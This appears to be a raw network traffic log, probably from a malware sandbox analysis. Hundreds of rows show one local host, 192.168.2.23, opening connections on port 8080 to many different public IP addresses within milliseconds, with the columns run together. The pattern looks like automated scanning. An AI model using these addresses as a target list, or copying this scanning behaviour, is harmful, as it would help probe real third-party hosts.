                                                            Feb 14, 2024 09:27:45.279036045 CET406848080192.168.2.2385.44.70.85
                                                            Feb 14, 2024 09:27:45.279038906 CET406848080192.168.2.2395.207.4.190
                                                            Feb 14, 2024 09:27:45.279040098 CET406848080192.168.2.2362.87.203.68
                                                            Feb 14, 2024 09:27:45.279040098 CET406848080192.168.2.2362.65.189.116
                                                            Feb 14, 2024 09:27:45.279041052 CET406848080192.168.2.2395.122.228.22
                                                            Feb 14, 2024 09:27:45.279041052 CET406848080192.168.2.2385.157.129.180
                                                            Feb 14, 2024 09:27:45.279041052 CET406848080192.168.2.2394.203.213.174
                                                            Feb 14, 2024 09:27:45.279041052 CET406848080192.168.2.2395.164.181.37
                                                            Feb 14, 2024 09:27:45.279047012 CET406848080192.168.2.2394.186.153.71
                                                            Feb 14, 2024 09:27:45.279052019 CET406848080192.168.2.2385.119.89.90
                                                            Feb 14, 2024 09:27:45.279052973 CET406848080192.168.2.2331.185.153.38
                                                            Feb 14, 2024 09:27:45.279052973 CET406848080192.168.2.2362.235.13.246
                                                            Feb 14, 2024 09:27:45.279057026 CET406848080192.168.2.2394.46.209.83
                                                            Feb 14, 2024 09:27:45.279057026 CET406848080192.168.2.2331.187.57.47
                                                            Feb 14, 2024 09:27:45.279057026 CET406848080192.168.2.2331.70.121.145
                                                            Feb 14, 2024 09:27:45.279062033 CET406848080192.168.2.2395.78.249.94
                                                            Feb 14, 2024 09:27:45.279062986 CET406848080192.168.2.2385.189.201.134
                                                            Feb 14, 2024 09:27:45.279074907 CET406848080192.168.2.2395.120.225.230
                                                            Feb 14, 2024 09:27:45.279074907 CET406848080192.168.2.2331.52.173.115
                                                            Feb 14, 2024 09:27:45.279078007 CET406848080192.168.2.2331.31.117.200
                                                            Feb 14, 2024 09:27:45.279083967 CET406848080192.168.2.2331.127.19.227
                                                            Feb 14, 2024 09:27:45.279083967 CET406848080192.168.2.2395.146.81.237
                                                            Feb 14, 2024 09:27:45.279083967 CET406848080192.168.2.2394.132.167.135
                                                            Feb 14, 2024 09:27:45.279083967 CET406848080192.168.2.2394.162.177.18
                                                            Feb 14, 2024 09:27:45.279083967 CET406848080192.168.2.2385.166.146.75
                                                            Feb 14, 2024 09:27:45.279083967 CET406848080192.168.2.2394.222.12.202
                                                            Feb 14, 2024 09:27:45.279095888 CET406848080192.168.2.2362.140.114.75
                                                            Feb 14, 2024 09:27:45.279095888 CET406848080192.168.2.2394.177.180.85
                                                            Feb 14, 2024 09:27:45.279113054 CET406848080192.168.2.2394.81.134.117
                                                            Feb 14, 2024 09:27:45.279113054 CET406848080192.168.2.2331.130.130.95
                                                            Feb 14, 2024 09:27:45.279122114 CET406848080192.168.2.2394.184.98.248
                                                            Feb 14, 2024 09:27:45.279124975 CET406848080192.168.2.2395.198.248.95
                                                            Feb 14, 2024 09:27:45.279131889 CET406848080192.168.2.2362.32.121.76
                                                            Feb 14, 2024 09:27:45.279138088 CET406848080192.168.2.2331.67.243.196
                                                            Feb 14, 2024 09:27:45.279146910 CET406848080192.168.2.2395.145.157.68
                                                            Feb 14, 2024 09:27:45.279153109 CET406848080192.168.2.2385.106.182.72
                                                            Feb 14, 2024 09:27:45.279156923 CET406848080192.168.2.2331.144.101.25
                                                            Feb 14, 2024 09:27:45.279166937 CET406848080192.168.2.2362.25.219.145
                                                            Feb 14, 2024 09:27:45.279175997 CET406848080192.168.2.2331.248.163.65
                                                            Feb 14, 2024 09:27:45.279179096 CET406848080192.168.2.2395.117.215.10
                                                            Feb 14, 2024 09:27:45.279186964 CET406848080192.168.2.2385.252.103.108
                                                            Feb 14, 2024 09:27:45.279186964 CET406848080192.168.2.2331.182.86.10
                                                            Feb 14, 2024 09:27:45.279189110 CET406848080192.168.2.2395.36.178.255
                                                            Feb 14, 2024 09:27:45.279190063 CET406848080192.168.2.2331.124.167.73
                                                            Feb 14, 2024 09:27:45.279194117 CET406848080192.168.2.2394.242.247.218
                                                            Feb 14, 2024 09:27:45.279201031 CET406848080192.168.2.2385.68.171.204
                                                            Feb 14, 2024 09:27:45.279203892 CET406848080192.168.2.2385.92.102.33
                                                            Feb 14, 2024 09:27:45.279213905 CET406848080192.168.2.2385.101.34.112
                                                            Feb 14, 2024 09:27:45.279226065 CET406848080192.168.2.2385.67.56.4
                                                            Feb 14, 2024 09:27:45.279228926 CET406848080192.168.2.2395.242.175.89
                                                            Feb 14, 2024 09:27:45.279236078 CET406848080192.168.2.2362.82.206.200
                                                            Feb 14, 2024 09:27:45.279236078 CET406848080192.168.2.2394.216.94.63
                                                            Feb 14, 2024 09:27:45.279247046 CET406848080192.168.2.2331.121.225.190
                                                            Feb 14, 2024 09:27:45.279247046 CET406848080192.168.2.2395.181.17.89
                                                            Feb 14, 2024 09:27:45.279256105 CET406848080192.168.2.2394.240.151.167
                                                            Feb 14, 2024 09:27:45.279263973 CET406848080192.168.2.2385.136.1.139
                                                            Feb 14, 2024 09:27:45.279263973 CET406848080192.168.2.2385.230.91.88
                                                            Feb 14, 2024 09:27:45.279277086 CET406848080192.168.2.2395.218.181.173
                                                            Feb 14, 2024 09:27:45.279277086 CET406848080192.168.2.2385.7.130.195
                                                            Feb 14, 2024 09:27:45.279280901 CET406848080192.168.2.2385.73.19.118
                                                            Feb 14, 2024 09:27:45.279283047 CET406848080192.168.2.2395.91.183.155
                                                            Feb 14, 2024 09:27:45.279297113 CET406848080192.168.2.2331.227.55.19
                                                            Feb 14, 2024 09:27:45.279297113 CET406848080192.168.2.2385.222.190.151
                                                            Feb 14, 2024 09:27:45.279309034 CET406848080192.168.2.2395.181.0.226
                                                            Feb 14, 2024 09:27:45.279313087 CET406848080192.168.2.2385.150.230.86
                                                            Feb 14, 2024 09:27:45.279318094 CET406848080192.168.2.2385.54.199.74
                                                            Feb 14, 2024 09:27:45.279325008 CET406848080192.168.2.2395.229.246.191
                                                            Feb 14, 2024 09:27:45.279335022 CET406848080192.168.2.2395.246.230.9
                                                            Feb 14, 2024 09:27:45.279335022 CET406848080192.168.2.2385.142.27.200
                                                            Feb 14, 2024 09:27:45.279336929 CET406848080192.168.2.2331.207.125.188
                                                            Feb 14, 2024 09:27:45.279341936 CET406848080192.168.2.2385.40.230.220
                                                            Feb 14, 2024 09:27:45.279341936 CET406848080192.168.2.2331.166.95.84
                                                            Feb 14, 2024 09:27:45.279360056 CET406848080192.168.2.2331.237.86.215
                                                            Feb 14, 2024 09:27:45.279360056 CET406848080192.168.2.2394.165.213.201
                                                            Feb 14, 2024 09:27:45.279362917 CET406848080192.168.2.2394.56.127.157
                                                            Feb 14, 2024 09:27:45.279370070 CET406848080192.168.2.2395.50.209.83
                                                            Feb 14, 2024 09:27:45.279376030 CET406848080192.168.2.2362.39.230.240
                                                            Feb 14, 2024 09:27:45.279381990 CET406848080192.168.2.2385.16.84.29
                                                            Feb 14, 2024 09:27:45.279385090 CET406848080192.168.2.2331.212.178.168
                                                            Feb 14, 2024 09:27:45.279401064 CET406848080192.168.2.2385.214.119.175
                                                            Feb 14, 2024 09:27:45.279401064 CET406848080192.168.2.2395.78.189.45
                                                            Feb 14, 2024 09:27:45.279402018 CET406848080192.168.2.2362.30.54.130
                                                            Feb 14, 2024 09:27:45.279402018 CET406848080192.168.2.2331.129.50.126
                                                            Feb 14, 2024 09:27:45.279409885 CET406848080192.168.2.2395.1.161.8
                                                            Feb 14, 2024 09:27:45.279419899 CET406848080192.168.2.2331.152.77.147
                                                            Feb 14, 2024 09:27:45.279424906 CET406848080192.168.2.2394.124.247.125
                                                            Feb 14, 2024 09:27:45.279426098 CET406848080192.168.2.2331.160.85.39
                                                            Feb 14, 2024 09:27:45.279426098 CET406848080192.168.2.2394.43.45.6
                                                            Feb 14, 2024 09:27:45.279436111 CET406848080192.168.2.2362.91.184.224
                                                            Feb 14, 2024 09:27:45.279441118 CET406848080192.168.2.2394.156.38.120
                                                            Feb 14, 2024 09:27:45.279453039 CET406848080192.168.2.2395.183.172.230
                                                            Feb 14, 2024 09:27:45.279454947 CET406848080192.168.2.2395.194.170.236
                                                            Feb 14, 2024 09:27:45.279455900 CET406848080192.168.2.2362.36.193.138
                                                            Feb 14, 2024 09:27:45.279455900 CET406848080192.168.2.2362.172.133.232
                                                            Feb 14, 2024 09:27:45.279463053 CET406848080192.168.2.2395.128.116.80
                                                            Feb 14, 2024 09:27:45.279481888 CET406848080192.168.2.2385.224.175.20
                                                            Feb 14, 2024 09:27:45.279481888 CET406848080192.168.2.2395.103.158.208
                                                            Feb 14, 2024 09:27:45.279484987 CET406848080192.168.2.2362.66.220.101
                                                            Feb 14, 2024 09:27:45.279488087 CET406848080192.168.2.2362.108.254.227
                                                            Feb 14, 2024 09:27:45.279488087 CET406848080192.168.2.2395.98.61.136
                                                            Feb 14, 2024 09:27:45.279488087 CET406848080192.168.2.2331.153.43.6
                                                            Feb 14, 2024 09:27:45.279490948 CET406848080192.168.2.2385.104.107.126
                                                            Feb 14, 2024 09:27:45.279494047 CET406848080192.168.2.2394.106.75.65
                                                            Feb 14, 2024 09:27:45.279503107 CET406848080192.168.2.2395.1.34.3
                                                            Feb 14, 2024 09:27:45.279505014 CET406848080192.168.2.2395.73.187.54
                                                            Feb 14, 2024 09:27:45.279506922 CET406848080192.168.2.2385.33.23.135
                                                            Feb 14, 2024 09:27:45.279506922 CET406848080192.168.2.2362.118.209.140
                                                            Feb 14, 2024 09:27:45.279506922 CET406848080192.168.2.2395.106.125.52
                                                            Feb 14, 2024 09:27:45.279521942 CET406848080192.168.2.2385.243.174.78
                                                            Feb 14, 2024 09:27:45.279525042 CET406848080192.168.2.2385.150.218.22
                                                            Feb 14, 2024 09:27:45.279535055 CET406848080192.168.2.2331.187.112.95
                                                            Feb 14, 2024 09:27:45.279535055 CET406848080192.168.2.2385.64.19.211
                                                            Feb 14, 2024 09:27:45.279542923 CET406848080192.168.2.2394.177.226.108
                                                            Feb 14, 2024 09:27:45.279546976 CET406848080192.168.2.2385.131.150.212
                                                            Feb 14, 2024 09:27:45.279548883 CET406848080192.168.2.2362.239.108.22
                                                            Feb 14, 2024 09:27:45.279561043 CET406848080192.168.2.2362.13.183.177
                                                            Feb 14, 2024 09:27:45.279562950 CET406848080192.168.2.2395.192.214.128
                                                            Feb 14, 2024 09:27:45.279567957 CET406848080192.168.2.2385.152.57.240
                                                            Feb 14, 2024 09:27:45.279572964 CET406848080192.168.2.2331.159.10.243
                                                            Feb 14, 2024 09:27:45.279588938 CET406848080192.168.2.2331.160.85.252
                                                            Feb 14, 2024 09:27:45.279594898 CET406848080192.168.2.2385.125.24.1
                                                            Feb 14, 2024 09:27:45.279594898 CET406848080192.168.2.2395.123.62.68
                                                            Feb 14, 2024 09:27:45.279598951 CET406848080192.168.2.2394.95.241.30
                                                            Feb 14, 2024 09:27:45.279598951 CET406848080192.168.2.2385.35.4.123
                                                            Feb 14, 2024 09:27:45.279613018 CET406848080192.168.2.2331.21.238.58
                                                            Feb 14, 2024 09:27:45.279613018 CET406848080192.168.2.2394.164.167.99
                                                            Feb 14, 2024 09:27:45.279623032 CET406848080192.168.2.2394.134.251.227
                                                            Feb 14, 2024 09:27:45.279623985 CET406848080192.168.2.2385.133.16.113
                                                            Feb 14, 2024 09:27:45.279644012 CET406848080192.168.2.2331.144.181.1
                                                            Feb 14, 2024 09:27:45.279652119 CET406848080192.168.2.2395.129.108.177
                                                            Feb 14, 2024 09:27:45.279654980 CET406848080192.168.2.2394.207.71.210
                                                            Feb 14, 2024 09:27:45.279659986 CET406848080192.168.2.2395.205.161.183
                                                            Feb 14, 2024 09:27:45.279659986 CET406848080192.168.2.2394.142.243.26
                                                            Feb 14, 2024 09:27:45.279664040 CET406848080192.168.2.2362.115.35.174
                                                            Feb 14, 2024 09:27:45.279670000 CET406848080192.168.2.2362.120.173.234
                                                            Feb 14, 2024 09:27:45.279670000 CET406848080192.168.2.2362.12.24.205
                                                            Feb 14, 2024 09:27:45.279670000 CET406848080192.168.2.2331.194.145.130
                                                            Feb 14, 2024 09:27:45.279680014 CET406848080192.168.2.2362.181.223.142
                                                            Feb 14, 2024 09:27:45.279681921 CET406848080192.168.2.2385.56.31.145
                                                            Feb 14, 2024 09:27:45.279681921 CET406848080192.168.2.2362.88.74.156
                                                            Feb 14, 2024 09:27:45.279692888 CET406848080192.168.2.2362.254.75.236
                                                            Feb 14, 2024 09:27:45.279692888 CET406848080192.168.2.2395.80.48.66
                                                            Feb 14, 2024 09:27:45.279695034 CET406848080192.168.2.2395.104.129.171
                                                            Feb 14, 2024 09:27:45.279710054 CET406848080192.168.2.2331.206.224.74
                                                            Feb 14, 2024 09:27:45.279710054 CET406848080192.168.2.2394.229.31.133
                                                            Feb 14, 2024 09:27:45.279712915 CET406848080192.168.2.2385.169.185.7
                                                            Feb 14, 2024 09:27:45.279721975 CET406848080192.168.2.2362.182.52.184
                                                            Feb 14, 2024 09:27:45.279721975 CET406848080192.168.2.2362.214.167.242
                                                            Feb 14, 2024 09:27:45.279732943 CET406848080192.168.2.2331.76.171.255
                                                            Feb 14, 2024 09:27:45.279732943 CET406848080192.168.2.2395.63.189.206
                                                            Feb 14, 2024 09:27:45.279742002 CET406848080192.168.2.2395.81.71.58
                                                            Feb 14, 2024 09:27:45.279747009 CET406848080192.168.2.2385.159.66.38
                                                            Feb 14, 2024 09:27:45.279751062 CET406848080192.168.2.2385.133.216.224
                                                            Feb 14, 2024 09:27:45.279751062 CET406848080192.168.2.2385.191.30.254
                                                            Feb 14, 2024 09:27:45.279768944 CET406848080192.168.2.2385.85.63.164
                                                            Feb 14, 2024 09:27:45.279778004 CET406848080192.168.2.2395.128.176.19
                                                            Feb 14, 2024 09:27:45.279781103 CET406848080192.168.2.2395.33.111.190
                                                            Feb 14, 2024 09:27:45.279786110 CET406848080192.168.2.2362.89.17.3
                                                            Feb 14, 2024 09:27:45.279786110 CET406848080192.168.2.2395.94.70.191
                                                            Feb 14, 2024 09:27:45.279788017 CET406848080192.168.2.2362.86.53.53
                                                            Feb 14, 2024 09:27:45.279797077 CET406848080192.168.2.2395.113.228.192
                                                            Feb 14, 2024 09:27:45.279797077 CET406848080192.168.2.2362.58.153.221
                                                            Feb 14, 2024 09:27:45.279804945 CET406848080192.168.2.2395.94.124.39
                                                            Feb 14, 2024 09:27:45.279808998 CET406848080192.168.2.2395.117.78.88
                                                            Feb 14, 2024 09:27:45.279820919 CET406848080192.168.2.2331.29.6.186
                                                            Feb 14, 2024 09:27:45.279824972 CET406848080192.168.2.2362.64.212.13
                                                            Feb 14, 2024 09:27:45.279835939 CET406848080192.168.2.2362.155.123.156
                                                            Feb 14, 2024 09:27:45.279835939 CET406848080192.168.2.2395.244.76.254
                                                            Feb 14, 2024 09:27:45.279838085 CET406848080192.168.2.2395.14.75.95
                                                            Feb 14, 2024 09:27:45.279838085 CET406848080192.168.2.2394.53.96.91
                                                            Feb 14, 2024 09:27:45.279839039 CET406848080192.168.2.2395.23.112.14
                                                            Feb 14, 2024 09:27:45.279846907 CET406848080192.168.2.2362.73.81.113
                                                            Feb 14, 2024 09:27:45.279856920 CET406848080192.168.2.2395.16.103.160
                                                            Feb 14, 2024 09:27:45.279856920 CET406848080192.168.2.2331.196.68.53
                                                            Feb 14, 2024 09:27:45.279859066 CET406848080192.168.2.2395.250.251.85
                                                            Feb 14, 2024 09:27:45.279859066 CET406848080192.168.2.2394.167.125.219
                                                            Feb 14, 2024 09:27:45.279859066 CET406848080192.168.2.2394.147.208.183
                                                            Feb 14, 2024 09:27:45.279859066 CET406848080192.168.2.2362.175.11.132
                                                            Feb 14, 2024 09:27:45.279864073 CET406848080192.168.2.2362.249.140.49
                                                            Feb 14, 2024 09:27:45.279864073 CET406848080192.168.2.2394.41.31.138
                                                            Feb 14, 2024 09:27:45.279866934 CET406848080192.168.2.2385.41.202.18
                                                            Feb 14, 2024 09:27:45.279872894 CET406848080192.168.2.2394.134.73.58
                                                            Feb 14, 2024 09:27:45.279875040 CET406848080192.168.2.2395.144.91.157
                                                            Feb 14, 2024 09:27:45.279886007 CET406848080192.168.2.2394.1.184.135
                                                            Feb 14, 2024 09:27:45.279897928 CET406848080192.168.2.2385.251.162.232
                                                            Feb 14, 2024 09:27:45.279901028 CET406848080192.168.2.2385.62.49.87
                                                            Feb 14, 2024 09:27:45.279901981 CET406848080192.168.2.2385.50.213.85
                                                            Feb 14, 2024 09:27:45.279901981 CET406848080192.168.2.2331.134.55.212
                                                            Feb 14, 2024 09:27:45.279902935 CET406848080192.168.2.2331.226.84.155
                                                            Feb 14, 2024 09:27:45.279903889 CET406848080192.168.2.2395.43.192.166
                                                            Feb 14, 2024 09:27:45.279902935 CET406848080192.168.2.2362.70.156.27
                                                            Feb 14, 2024 09:27:45.279910088 CET406848080192.168.2.2394.195.230.55
                                                            Feb 14, 2024 09:27:45.279910088 CET406848080192.168.2.2395.207.49.179
                                                            Feb 14, 2024 09:27:45.279911995 CET406848080192.168.2.2385.220.223.243
                                                            Feb 14, 2024 09:27:45.279911995 CET406848080192.168.2.2394.192.188.118
                                                            Feb 14, 2024 09:27:45.279911995 CET406848080192.168.2.2362.164.98.6
                                                            Feb 14, 2024 09:27:45.279918909 CET406848080192.168.2.2395.23.12.123
                                                            Feb 14, 2024 09:27:45.279921055 CET406848080192.168.2.2394.28.40.186
                                                            Feb 14, 2024 09:27:45.279923916 CET406848080192.168.2.2394.81.49.180
                                                            Feb 14, 2024 09:27:45.279925108 CET406848080192.168.2.2362.81.135.76
                                                            Feb 14, 2024 09:27:45.279926062 CET406848080192.168.2.2395.57.170.91
                                                            Feb 14, 2024 09:27:45.279926062 CET406848080192.168.2.2331.38.147.173
                                                            Feb 14, 2024 09:27:45.279931068 CET406848080192.168.2.2395.114.102.85
                                                            Feb 14, 2024 09:27:45.279936075 CET406848080192.168.2.2395.107.22.237
                                                            Feb 14, 2024 09:27:45.279942036 CET406848080192.168.2.2331.146.229.242
                                                            Feb 14, 2024 09:27:45.279942036 CET406848080192.168.2.2394.127.151.248
                                                            Feb 14, 2024 09:27:45.279942036 CET406848080192.168.2.2385.111.165.45
                                                            Feb 14, 2024 09:27:45.279956102 CET406848080192.168.2.2395.205.207.212
                                                            Feb 14, 2024 09:27:45.279958963 CET406848080192.168.2.2385.173.218.80
                                                            Feb 14, 2024 09:27:45.279968977 CET406848080192.168.2.2331.33.24.163
                                                            Feb 14, 2024 09:27:45.279968977 CET406848080192.168.2.2385.255.79.144
                                                            Feb 14, 2024 09:27:45.279970884 CET406848080192.168.2.2385.185.121.138
                                                            Feb 14, 2024 09:27:45.279977083 CET406848080192.168.2.2362.79.45.221
                                                            Feb 14, 2024 09:27:45.279979944 CET406848080192.168.2.2385.168.218.170
                                                            Feb 14, 2024 09:27:45.279988050 CET406848080192.168.2.2362.29.68.248
                                                            Feb 14, 2024 09:27:45.279988050 CET406848080192.168.2.2385.190.160.90
                                                            Feb 14, 2024 09:27:45.279997110 CET406848080192.168.2.2394.1.241.201
                                                            Feb 14, 2024 09:27:45.279998064 CET406848080192.168.2.2395.135.120.13
                                                            Feb 14, 2024 09:27:45.280004978 CET406848080192.168.2.2385.243.188.97
                                                            Feb 14, 2024 09:27:45.280010939 CET406848080192.168.2.2395.184.199.202
                                                            Feb 14, 2024 09:27:45.280016899 CET406848080192.168.2.2394.180.74.230
                                                            Feb 14, 2024 09:27:45.280018091 CET406848080192.168.2.2331.121.198.16
                                                            Feb 14, 2024 09:27:45.280030966 CET406848080192.168.2.2362.23.115.253
                                                            Feb 14, 2024 09:27:45.280033112 CET406848080192.168.2.2362.123.246.136
                                                            Feb 14, 2024 09:27:45.280042887 CET406848080192.168.2.2385.233.182.227
                                                            Feb 14, 2024 09:27:45.280044079 CET406848080192.168.2.2362.138.147.164
                                                            Feb 14, 2024 09:27:45.280045033 CET406848080192.168.2.2395.56.136.169
                                                            Feb 14, 2024 09:27:45.280047894 CET406848080192.168.2.2395.136.107.163
                                                            Feb 14, 2024 09:27:45.280062914 CET406848080192.168.2.2385.110.124.45
                                                            Feb 14, 2024 09:27:45.280066013 CET406848080192.168.2.2362.87.33.150
                                                            Feb 14, 2024 09:27:45.280085087 CET406848080192.168.2.2395.238.97.168
                                                            Feb 14, 2024 09:27:45.280086994 CET406848080192.168.2.2395.25.75.84
                                                            Feb 14, 2024 09:27:45.280086994 CET406848080192.168.2.2385.232.233.62
                                                            Feb 14, 2024 09:27:45.280087948 CET406848080192.168.2.2331.151.206.125
                                                            Feb 14, 2024 09:27:45.280090094 CET406848080192.168.2.2362.63.248.21
                                                            Feb 14, 2024 09:27:45.280090094 CET406848080192.168.2.2385.146.140.10
                                                            Feb 14, 2024 09:27:45.280097961 CET406848080192.168.2.2385.210.77.66
                                                            Feb 14, 2024 09:27:45.280103922 CET406848080192.168.2.2362.178.125.111
                                                            Feb 14, 2024 09:27:45.280106068 CET406848080192.168.2.2395.90.172.254
                                                            Feb 14, 2024 09:27:45.280113935 CET406848080192.168.2.2395.110.180.81
                                                            Feb 14, 2024 09:27:45.280128956 CET406848080192.168.2.2394.188.97.196
                                                            Feb 14, 2024 09:27:45.280129910 CET406848080192.168.2.2394.254.198.29
                                                            Feb 14, 2024 09:27:45.280129910 CET406848080192.168.2.2362.105.245.51
                                                            Feb 14, 2024 09:27:45.280129910 CET406848080192.168.2.2331.56.0.164
                                                            Feb 14, 2024 09:27:45.280138969 CET406848080192.168.2.2385.49.101.125
                                                            Feb 14, 2024 09:27:45.280149937 CET406848080192.168.2.2331.176.232.179
                                                            Feb 14, 2024 09:27:45.280153990 CET406848080192.168.2.2395.97.248.238
                                                            Feb 14, 2024 09:27:45.280153990 CET406848080192.168.2.2395.107.101.121
                                                            Feb 14, 2024 09:27:45.280160904 CET406848080192.168.2.2331.141.23.125
                                                            Feb 14, 2024 09:27:45.280163050 CET406848080192.168.2.2385.76.232.202
                                                            Feb 14, 2024 09:27:45.280164003 CET406848080192.168.2.2331.133.224.194
                                                            Feb 14, 2024 09:27:45.280174017 CET406848080192.168.2.2362.62.188.134
                                                            Feb 14, 2024 09:27:45.280188084 CET406848080192.168.2.2395.112.15.56
                                                            Feb 14, 2024 09:27:45.280188084 CET406848080192.168.2.2395.247.20.3
                                                            Feb 14, 2024 09:27:45.280193090 CET406848080192.168.2.2385.20.240.113
                                                            Feb 14, 2024 09:27:45.280220032 CET406848080192.168.2.2331.181.208.122
                                                            Feb 14, 2024 09:27:45.280220985 CET406848080192.168.2.2362.206.99.71
                                                            Feb 14, 2024 09:27:45.280220985 CET406848080192.168.2.2331.131.76.118
                                                            Feb 14, 2024 09:27:45.280221939 CET406848080192.168.2.2331.42.235.115
                                                            Feb 14, 2024 09:27:45.280225992 CET406848080192.168.2.2394.168.217.68
                                                            Feb 14, 2024 09:27:45.280230045 CET406848080192.168.2.2385.135.235.62
                                                            Feb 14, 2024 09:27:45.280242920 CET406848080192.168.2.2395.114.123.154
                                                            Feb 14, 2024 09:27:45.280242920 CET406848080192.168.2.2394.46.189.43
                                                            Feb 14, 2024 09:27:45.280247927 CET406848080192.168.2.2395.32.77.248
                                                            Feb 14, 2024 09:27:45.280255079 CET406848080192.168.2.2394.36.107.53
                                                            Feb 14, 2024 09:27:45.280258894 CET406848080192.168.2.2394.2.195.94
                                                            Feb 14, 2024 09:27:45.280273914 CET406848080192.168.2.2385.11.109.4
                                                            Feb 14, 2024 09:27:45.280281067 CET406848080192.168.2.2331.41.37.68
                                                            Feb 14, 2024 09:27:45.280281067 CET406848080192.168.2.2394.17.196.16
                                                            Feb 14, 2024 09:27:45.280281067 CET406848080192.168.2.2385.74.243.221
                                                            Feb 14, 2024 09:27:45.280303001 CET406848080192.168.2.2385.133.28.187
                                                            Feb 14, 2024 09:27:45.280303001 CET406848080192.168.2.2385.97.195.101
                                                            Feb 14, 2024 09:27:45.280303955 CET406848080192.168.2.2394.46.189.59
                                                            Feb 14, 2024 09:27:45.280307055 CET406848080192.168.2.2394.88.60.103
                                                            Feb 14, 2024 09:27:45.280308962 CET406848080192.168.2.2394.143.126.98
                                                            Feb 14, 2024 09:27:45.280323982 CET406848080192.168.2.2395.140.153.8
                                                            Feb 14, 2024 09:27:45.280327082 CET406848080192.168.2.2394.183.105.20
                                                            Feb 14, 2024 09:27:45.280328035 CET406848080192.168.2.2394.118.22.204
                                                            Feb 14, 2024 09:27:45.280349016 CET406848080192.168.2.2395.73.96.170
                                                            Feb 14, 2024 09:27:45.280353069 CET406848080192.168.2.2394.0.199.29
                                                            Feb 14, 2024 09:27:45.280359983 CET406848080192.168.2.2331.123.14.167
                                                            Feb 14, 2024 09:27:45.280359983 CET406848080192.168.2.2385.96.211.23
                                                            Feb 14, 2024 09:27:45.280370951 CET406848080192.168.2.2362.37.155.112
                                                            Feb 14, 2024 09:27:45.280374050 CET406848080192.168.2.2395.137.115.175
                                                            Feb 14, 2024 09:27:45.280386925 CET406848080192.168.2.2331.159.27.143
                                                            Feb 14, 2024 09:27:45.280389071 CET406848080192.168.2.2331.248.162.150
                                                            Feb 14, 2024 09:27:45.280389071 CET406848080192.168.2.2385.154.5.62
                                                            Feb 14, 2024 09:27:45.280390024 CET406848080192.168.2.2362.59.41.224
                                                            Feb 14, 2024 09:27:45.280390024 CET406848080192.168.2.2385.214.195.22
                                                            Feb 14, 2024 09:27:45.280400038 CET406848080192.168.2.2331.170.156.33
                                                            Feb 14, 2024 09:27:45.280400991 CET406848080192.168.2.2385.94.94.5
                                                            Feb 14, 2024 09:27:45.280400991 CET406848080192.168.2.2385.60.4.208
                                                            Feb 14, 2024 09:27:45.280401945 CET406848080192.168.2.2362.70.132.72
                                                            Feb 14, 2024 09:27:45.280400038 CET406848080192.168.2.2394.47.183.63
                                                            Feb 14, 2024 09:27:45.280402899 CET406848080192.168.2.2362.171.179.33
                                                            Feb 14, 2024 09:27:45.280402899 CET406848080192.168.2.2362.26.71.52
                                                            Feb 14, 2024 09:27:45.280402899 CET406848080192.168.2.2362.97.42.26
                                                            Feb 14, 2024 09:27:45.280405045 CET406848080192.168.2.2394.242.113.201
                                                            Feb 14, 2024 09:27:45.280410051 CET406848080192.168.2.2362.18.102.35
                                                            Feb 14, 2024 09:27:45.280415058 CET406848080192.168.2.2331.159.189.36
                                                            Feb 14, 2024 09:27:45.280415058 CET406848080192.168.2.2331.177.24.28
                                                            Feb 14, 2024 09:27:45.280416965 CET406848080192.168.2.2362.159.72.237
                                                            Feb 14, 2024 09:27:45.280420065 CET406848080192.168.2.2385.75.68.233
                                                            Feb 14, 2024 09:27:45.280428886 CET406848080192.168.2.2394.81.222.125
                                                            Feb 14, 2024 09:27:45.280435085 CET406848080192.168.2.2362.153.249.177
                                                            Feb 14, 2024 09:27:45.280442953 CET406848080192.168.2.2385.18.106.152
                                                            Feb 14, 2024 09:27:45.280442953 CET406848080192.168.2.2362.78.9.75
                                                            Feb 14, 2024 09:27:45.280447006 CET406848080192.168.2.2331.213.151.236
                                                            Feb 14, 2024 09:27:45.280448914 CET406848080192.168.2.2362.61.20.230
                                                            Feb 14, 2024 09:27:45.280456066 CET406848080192.168.2.2385.152.216.37
                                                            Feb 14, 2024 09:27:45.280457020 CET406848080192.168.2.2362.76.146.141
                                                            Feb 14, 2024 09:27:45.280457020 CET406848080192.168.2.2394.164.80.102
                                                            Feb 14, 2024 09:27:45.280463934 CET406848080192.168.2.2362.136.242.239
                                                            Feb 14, 2024 09:27:45.280466080 CET406848080192.168.2.2394.138.223.209
                                                            Feb 14, 2024 09:27:45.280466080 CET406848080192.168.2.2385.204.31.123
                                                            Feb 14, 2024 09:27:45.280477047 CET406848080192.168.2.2362.198.246.13
                                                            Feb 14, 2024 09:27:45.280479908 CET406848080192.168.2.2331.188.80.93
                                                            Feb 14, 2024 09:27:45.280493975 CET406848080192.168.2.2394.232.125.173
                                                            Feb 14, 2024 09:27:45.280498981 CET406848080192.168.2.2394.80.243.206
                                                            Feb 14, 2024 09:27:45.280500889 CET406848080192.168.2.2362.161.56.117
                                                            Feb 14, 2024 09:27:45.280508995 CET406848080192.168.2.2362.237.143.205
                                                            Feb 14, 2024 09:27:45.280512094 CET406848080192.168.2.2385.216.132.11
                                                            Feb 14, 2024 09:27:45.280517101 CET406848080192.168.2.2362.84.148.220
                                                            Feb 14, 2024 09:27:45.280522108 CET406848080192.168.2.2331.228.134.190
                                                            Feb 14, 2024 09:27:45.280522108 CET406848080192.168.2.2362.132.190.199
                                                            Feb 14, 2024 09:27:45.280527115 CET406848080192.168.2.2395.159.150.77
                                                            Feb 14, 2024 09:27:45.280531883 CET406848080192.168.2.2362.42.170.220
                                                            Feb 14, 2024 09:27:45.280531883 CET406848080192.168.2.2395.160.70.183
                                                            Feb 14, 2024 09:27:45.280535936 CET406848080192.168.2.2331.73.188.102
                                                            Feb 14, 2024 09:27:45.280544996 CET406848080192.168.2.2395.35.140.32
                                                            Feb 14, 2024 09:27:45.280544996 CET406848080192.168.2.2331.161.124.148
                                                            Feb 14, 2024 09:27:45.280545950 CET406848080192.168.2.2362.40.108.56
                                                            Feb 14, 2024 09:27:45.280548096 CET406848080192.168.2.2385.126.167.20
                                                            Feb 14, 2024 09:27:45.280563116 CET406848080192.168.2.2385.41.50.172
                                                            Feb 14, 2024 09:27:45.280565977 CET406848080192.168.2.2394.154.159.109
                                                            Feb 14, 2024 09:27:45.280571938 CET406848080192.168.2.2394.114.19.23
                                                            Feb 14, 2024 09:27:45.280576944 CET406848080192.168.2.2395.165.65.213
                                                            Feb 14, 2024 09:27:45.280580997 CET406848080192.168.2.2362.95.187.31
                                                            Feb 14, 2024 09:27:45.280591011 CET406848080192.168.2.2331.84.212.15
                                                            Feb 14, 2024 09:27:45.280601025 CET406848080192.168.2.2385.171.73.53
